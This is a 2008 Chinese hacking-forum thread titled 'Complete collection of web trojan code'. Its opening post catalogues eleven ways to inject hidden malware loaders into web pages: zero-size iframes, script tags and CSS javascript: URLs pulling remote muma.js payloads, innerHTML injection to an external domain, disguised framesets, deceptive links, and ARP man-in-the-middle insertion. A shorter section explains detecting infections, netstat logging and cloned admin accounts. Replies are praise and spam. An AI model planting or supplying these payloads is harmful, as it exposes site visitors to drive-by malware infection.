.::: 一路问情 :::.
  • 注册
  • 登录
  • 会员
  • FTP资源中心
  • 七海争霸
  • 社区设施
  • 帮助
.::: 一路问情 :::. » 『黑客技术』 » 网页木马代码大全
‹‹ 上一主题 | 下一主题 ››
发新话题
  • 发新话题
  • 发布投票
  • 发布商品
  • 发布悬赏
  • 发布活动
  • 发布辩论
  • 发布视频
打印

网页木马代码大全

冰碎枫

荣誉会员

Rank: 10Rank: 10Rank: 10

帖子
1148 
威望
2438 点 
金钱
3789 元 
好评
16 点 

优秀版主奖 活动大师奖

  • 个人空间
  • 发短消息
  • 加为好友
  • 当前离线
1楼 大 中 小 发表于 2008-4-19 17:46  只看该作者

网页木马代码大全

网页木马代码大全
一:框架挂马

     <iframe src=地址 width=0 height=0></iframe>

二:js文件挂马
   
     首先将以下代码
     document.write("<iframe width='0' height='0' src='地址'></iframe>");
     保存为xxx.js,
     则JS挂马代码为
     <script language=javascript src=xxx.js></script>

三:js变形加密
   
     <SCRIPT language="JScript.Encode"            src=http://www.xxx.com/muma.txt></script>
     muma.txt可改成任意后缀
四:body挂马

     <body ></body>

五:隐蔽挂马

     top.document.body.innerHTML = top.document.body.innerHTML +      '\r\n<iframe src="http://www.yaxiyar.com/"></iframe>';

六:css中挂马

     body {
     background-image: url('javascript:document.write("<script            src=http://www.XXX.net/muma.js></script>")')}

七:JAJA挂马

    <SCRIPT language=javascript>      
    window.open    ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro    llbars=no,width=1,height=1");  
    </script>

八:图片伪装

    <html>
    <iframe src="网马地址" height=0 width=0></iframe>
    <img src="图片地址"></center>
    </html>

九:伪装调用:

     <frameset rows="444,0" cols="*">
     <frame src="打开网页" framborder="no" scrolling="auto" noresize      marginwidth="0"margingheight="0">
     <frame src="网马地址" frameborder="no" scrolling="no"     noresize      marginwidth="0"margingheight="0">
     </frameset>

十:高级欺骗

     <a href="http://www.yaxiyar.com(迷惑连接地址,显示这个地址指向木马地址)" > 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

十一: 超级网马—通过arp欺骗来直接挂马

原理:arp中间人攻击,实际上相当于做了一次代理。

正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A---->C---->B
B---->C---->A
实际上,C在这里做了一次代理的作用

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如

<iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果

A是管理员或者是目标单位,就直接挂上马了。

如何处理网页木马:
1、找到嵌入的网页木马文件。以下,拿自己的经历说事。找到的文件是wm.htm

2、在注册表中查找wm.htm。很幸运,找到了。开始顺藤摸瓜...

3、修改键值wm.htm为wm_nnd.htm。

4、再次查找wm.htm。很不幸,又查到了。说明有服务程序在作怪。嘿嘿,有意外发现。
    cain.exe,据说是密码嗅探器。

5、修改键值cain.exe为cain_nnd.exe。

6、查找cain.exe,仍然可以查到。嘻嘻,在预料之中。

7、怀疑wm.htm与cain.exe同流合污,背后有服务程序作后台。

8、快查查看,系统服务程序。在运行->msconfig 或直接在命令行使用net start,查看可疑程序

9、发现temp*.exe(全名记不清了),立马net stop server 。

10、快去修改键值wm.htm为wm_nnd.htm,cain.exe为cain_nnd.exe。

11、再次查找wm.htm或cain.exe,没有找到。哈哈,很好。

12、观察了几天,没再发生挂马的现象。 另外,通过检测网络连接查看服务器是否中了木马或病毒

1、使用netstat -an 查看所有和本地计算机建立连接的IP。

2、连接包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。

通过这个命令的详细信息,可以完全监控计算机上的连接,从而达到控制计算机的目的。

3、手工制作bat程序,生成网络连接日志文件供站长分析:bat文件代码如下

REM 注释:监控的时间
time /t>>Netstat.log
REM 每隔30秒,把服务器上通过tcp协议通讯的IP和端口写入日志文件
Netstat -n -p tcp 30>>Netstat.log

注意:要谨慎使用,这会给服务器带来性能影响。最好,在服务器发生异常,怀疑中木马或病毒时,用来分析网络连接日志。

仅仅这些还不够,说说更严重的:

1、可恶的攻击者喜欢使用克隆账号的方法来控制你的计算机。“它们”激活一个系统中的默认账户,但这个账户是不经常用的, 然后使用工具

把这个账户提升到管理员权限,从表面上看来这个账户还是和原来一样,但是这个克隆的账户却是系统中最大的安全隐患。
  
2、赶快检测系统帐户:
a、在命令行下输入net user,查看计算机上有些什么用户。
b、使用“net user 用户名”查看这个用户属于什么权限的及登录时间等。
c、一般除了Administrator是administrators组的,如果你发现一个系统内置的用户是属于administrators组的,
      那么别人在你的计算机上克隆账户的概率为90%。
d、是使用“net user 用户名 /del” 来删掉这个用户,还是修改其它配置,这你说了算。
本帖最近评分记录
  • 评分者:baobeiyaner 赠送:威望+15   评语:技术文章 日期:2008-4-22 21:47
  • 评分者:baobeiyaner 赠送:金钱+26   评语:技术文章 日期:2008-4-22 21:47



QQ
UID
1520 
精华
2 
积分
2438 
钻石
1 克拉 
宣传
0 点 
来路
搜索引擎 
阅读权限
150 
性别
男 
在线时间
210 小时 
注册时间
2007-6-12 
最后登录
2008-7-23 

查看详细资料

TOP

thenq
看贴不回的后果

初级会员

帖子
85 
威望
31 点 
金钱
99 元 
好评
0 点 
  • 个人空间
  • 发短消息
  • 加为好友
  • 当前离线
2楼 大 中 小 发表于 2008-4-21 09:05  只看该作者
收藏



QQ
UID
92904 
精华
0 
积分
31 
钻石
0 克拉 
宣传
0 点 
来路
搜索引擎 
阅读权限
10 
性别
男 
来自
fuzhou 
在线时间
25 小时 
注册时间
2008-4-18 
最后登录
2008-4-29 

查看详细资料

TOP

xcliuhao3460

初级会员

帖子
1 
威望
0 点 
金钱
1 元 
好评
0 点 
  • 个人空间
  • 发短消息
  • 加为好友
  • 当前离线
3楼 大 中 小 发表于 2008-4-22 14:30  只看该作者

··········

你空那个  怎么回复不成咯啊 。   我想下个



QQ
UID
93707 
精华
0 
积分
0 
钻石
0 克拉 
宣传
0 点 
来路
误闯进来 
阅读权限
10 
性别
男 
来自
河南许昌 
在线时间
0 小时 
注册时间
2008-4-22 
最后登录
2008-4-22 

查看详细资料

TOP

baobeiyaner

初级会员

帖子
203 
威望
23 点 
金钱
198 元 
好评
1120 点 

宣传大使

  • 个人空间
  • 发短消息
  • 加为好友
  • 当前离线
4楼 大 中 小 发表于 2008-4-22 21:45  只看该作者
蛮牛B的



QQ
UID
93660 
精华
0 
积分
23 
钻石
0 克拉 
宣传
0 点 
来路
误闯进来 
阅读权限
10 
性别
女 
来自
南京 
在线时间
88 小时 
注册时间
2008-4-22 
最后登录
2008-6-27 

查看详细资料

TOP

冰碎枫

荣誉会员

Rank: 10Rank: 10Rank: 10

帖子
1148 
威望
2438 点 
金钱
3789 元 
好评
16 点 

优秀版主奖 活动大师奖

  • 个人空间
  • 发短消息
  • 加为好友
  • 当前离线
5楼 大 中 小 发表于 2008-4-22 21:45  只看该作者
引用:
原帖由 xcliuhao3460 于 2008-4-22 14:30 发表
你空那个  怎么回复不成咯啊 。   我想下个
????我发的??



QQ
UID
1520 
精华
2 
积分
2438 
钻石
1 克拉 
宣传
0 点 
来路
搜索引擎 
阅读权限
150 
性别
男 
在线时间
210 小时 
注册时间
2007-6-12 
最后登录
2008-7-23 

查看详细资料

TOP

紫太阳

初级会员

帖子
23 
威望
10 点 
金钱
2 元 
好评
0 点 
  • 个人空间
  • 发短消息
  • 加为好友
  • 当前离线
6楼 大 中 小 发表于 2008-4-30 15:15  只看该作者
观察中,,,



QQ
UID
85734 
精华
0 
积分
10 
钻石
0 克拉 
宣传
0 点 
来路
朋友介绍 
阅读权限
10 
性别
男 
来自
易水萧寒 
在线时间
2 小时 
注册时间
2008-3-22 
最后登录
2008-5-11 

查看详细资料

TOP

孤单下去。
看贴不回的后果

中级会员

Rank: 2

帖子
541 
威望
117 点 
金钱
24 元 
好评
0 点 

MM专用勋章 无敌RP勋章

  • 个人空间
  • 发短消息
  • 加为好友
  • 当前离线
7楼 大 中 小 发表于 2008-5-1 13:42  只看该作者
顶下 顶下 顶下 顶下



QQ
UID
84408 
精华
0 
积分
117 
钻石
0 克拉 
宣传
0 点 
来路
误闯进来 
阅读权限
20 
性别
女 
来自
天国 
在线时间
45 小时 
注册时间
2008-3-17 
最后登录
2008-7-10 

查看详细资料

TOP

pojieqi

禁止访问

帖子
11 
威望
0 点 
金钱
17 元 
好评
0 点 
  • 个人空间
  • 发短消息
  • 加为好友
  • 当前离线
8楼 大 中 小 发表于 2008-5-6 19:51  只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
QQ
UID
97892 
精华
0 
积分
0 
钻石
0 克拉 
宣传
0 点 
来路
搜索引擎 
阅读权限
0 
性别
男 
来自
福建 
在线时间
0 小时 
注册时间
2008-5-6 
最后登录
2008-5-6 

查看详细资料

TOP

henaiqiu

初级会员

帖子
66 
威望
1 点 
金钱
80 元 
好评
0 点 
  • 个人空间
  • 发短消息
  • 加为好友
  • 当前离线
9楼 大 中 小 发表于 2008-5-9 10:39  只看该作者
欢迎大家加入外贸领域!

http://externaltrade.5d6d.com/bbs.php

另外想申请版主的请在此留言!

http://externaltrade.5d6d.com/thread-138-1-1.html



QQ
UID
90066 
精华
0 
积分
1 
钻石
0 克拉 
宣传
0 点 
来路
搜索引擎 
阅读权限
10 
性别
男 
来自
四川 
在线时间
5 小时 
注册时间
2008-4-5 
最后登录
2008-7-9 

查看详细资料

TOP

haiweix
看贴不回的后果

中级会员

Rank: 2

帖子
229 
威望
65 点 
金钱
464 元 
好评
0 点 
  • 个人空间
  • 发短消息
  • 加为好友
  • 当前离线
10楼 大 中 小 发表于 2008-5-9 12:26  只看该作者
好东西.学习一下,谢谢楼主.



QQ
UID
98683 
精华
0 
积分
65 
钻石
0 克拉 
宣传
0 点 
来路
搜索引擎 
阅读权限
20 
性别
男 
来自
山东 
在线时间
14 小时 
注册时间
2008-5-9 
最后登录
2008-7-24 

查看详细资料

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题
 

 

当前时区 GMT+8, 现在时间是 2008-7-24 15:56 蜀ICP备08000616号

清除 Cookies - 联系我们 - Ask Love - Archiver - WAP - TOP - 界面风格

  • YUYU_Emera-x

Powered by Discuz! 6.0.0,

Processed in 0.021318 second(s), 6 queries, Gzip enabled.

  • 控制面板首页
  • 编辑个人资料
  • 积分交易
  • 积分记录
  • 公众用户组
  • 个人空间管理
  • 社区银行
  • 资源中心
  • 名人堂
  • 生存游戏
  • 勋章中心
  • 醒目高亮
  • 空间互踩
  • 便民查询
  • 邮箱图标
点击查看问情在alexa中的世界排名
一路问情友情提示你:认真回帖,是一种美德!
点击查看问情在alexa中的世界排名
论坛是我家,维护靠大家!--问情宣
一路问情友情提示你:认真回帖,是一种美德!
一路问情友情提示你:认真回帖,是一种美德!
点击查看问情在alexa中的世界排名
点击查看问情在alexa中的世界排名
如果你喜欢一路问情,请同时向你的5个QQ好友宣传Sy64.Com,多谢支持!
如果你喜欢一路问情,请同时向你的5个QQ好友宣传Sy64.Com,多谢支持!